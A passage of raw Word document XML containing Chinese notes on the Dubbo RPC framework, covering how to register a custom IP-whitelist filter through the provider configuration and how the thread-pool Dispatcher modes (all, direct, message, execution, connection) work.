          <w:numId w:val="97"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>配置文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>参考：</w:t>
      </w:r>
      <w:hyperlink r:id="rId308" w:anchor="DeveloperGuide-zh-%E8%B0%83%E7%94%A8%E6%8B%A6%E6%88%AA%E6%89%A9%E5%B1%95" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
            <w:color w:val="333333"/>
            <w:sz w:val="15"/>
            <w:szCs w:val="15"/>
          </w:rPr>
          <w:t>调用拦截扩展</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
        <w:t>在resources目录下添加纯文本文件META-INF/dubbo/com.alibaba.dubbo.rpc.Filter，内容如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>xxxFilter=com.xxx.AuthorityFilter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="288" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>修改dubbo的provider配置文件，在dubbo:provider中添加配置的filter，如下：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>&lt;dubbo:provider filter="xxxFilter"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;dubbo:parameter key="qaccesslog" value="9"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t xml:space="preserve">    &lt;dubbo:parameter key="qloglevel" value="8"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:left w:val="single" w:sz="18" w:space="9" w:color="E8E8E8"/>
          <w:bottom w:val="single" w:sz="4" w:space="6" w:color="E8E8E8"/>
          <w:right w:val="single" w:sz="4" w:space="9" w:color="E8E8E8"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="FBFBFB"/>
        <w:spacing w:line="253" w:lineRule="atLeast"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="14"/>
          <w:szCs w:val="14"/>
        </w:rPr>
        <w:t>&lt;/dubbo:provider&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00537D8C" w:rsidRDefault="00537D8C" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>这样就可以实现dubbo接口的IP白名单功能了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55C65" w:rsidRDefault="00B55C65" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B55C65" w:rsidRDefault="00B55C65" w:rsidP="00B55C65">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dubbo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程池</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B55C65" w:rsidRDefault="00B55C65" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B55C65" w:rsidRDefault="00B55C65" w:rsidP="00537D8C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:wordWrap w:val="0"/>
        <w:spacing w:line="288" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>如果事件处理的逻辑能迅速完成，并且不会发起新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>请求，比如只是在内存中记个标识，则直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>线程上处理更快，因为减少了线程池调度。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>但如果事件处理逻辑较慢，或者需要发起新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>请求，比如需要查询数据库，则必须派发到线程池，否则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>线程阻塞，将导致不能接收其它请求。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>如果用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>线程处理事件，又在事件处理过程中发起新的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>请求，比如在连接事件中发起登录请求，会报</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>可能引发死锁</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>异常，但不会真死锁。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Dispatcher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">all </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>所有消息都派发到线程池，包括请求，响应，连接事件，断开事件，心跳等。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">direct </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>所有消息都不派发到线程池，全部在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>线程上直接执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>只有请求响应消息派发到线程池，其它连接断开事件，心跳等消息，直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>线程上执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">execution </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>只请求消息派发到线程池，不含响应，响应和其它连接断开事件，心跳等消息，直接在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>线程上执行。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">connection </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
